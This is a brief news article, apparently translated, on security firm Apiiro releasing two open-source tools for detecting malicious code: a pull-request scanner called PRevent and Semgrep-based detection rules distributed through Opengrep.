Application security company Apiiro is releasing two open-source tools to help organizations defend against malicious code in their applications.
This action follows security research by Apiiro itself, reports SD Times. This shows that there are thousands of instances of malicious code present in repositories and packages.
According to the company, the focus of the research was on in-depth code analysis. And on identifying patterns in malicious code to develop defense strategies. Malicious code is one of the most accessible and easily executed attack vectors, according to the company. Apiiro adds that the security of dependency managers and source code hosting platforms is still evolving.
That type of security has major gaps in its current implementation, according to Apiiro, such as in verification of human and digital identities, validation of source code and releases, and more. Apiiro also recognizes many security problems in build systems, artifact managers and pipeline tools.
Obfuscated and naive code
The research shows that attackers usually introduce malicious code via anti-patterns. Here, obfuscated (obfuscated) code plays an important role. A second anti-pattern is naive code execution, where code is received as data and executed immediately without being scanned beforehand.
The new open-source tools detect the introduction of malicious code in most cases. The first tool is PRevent. This is an open-source application that scans pull requests, detects suspicious code and sends notifications. PRevent offers easy integration, high configurability and essential orchestration features.
The second tool is a set of malicious code detection rules designed to run on Semgrep. These rules are now available through Opengrep, a fork of Semgrep.
Code review
Apiiro advises that the best way to keep malicious code out of the codebase is to use a pre-merge hook. This is a process triggered on pull request events via Webhooks and managed by strictly authorized entities. PRevent can initiate code reviews, or even block merges until a scan is approved or a reviewer gives permission.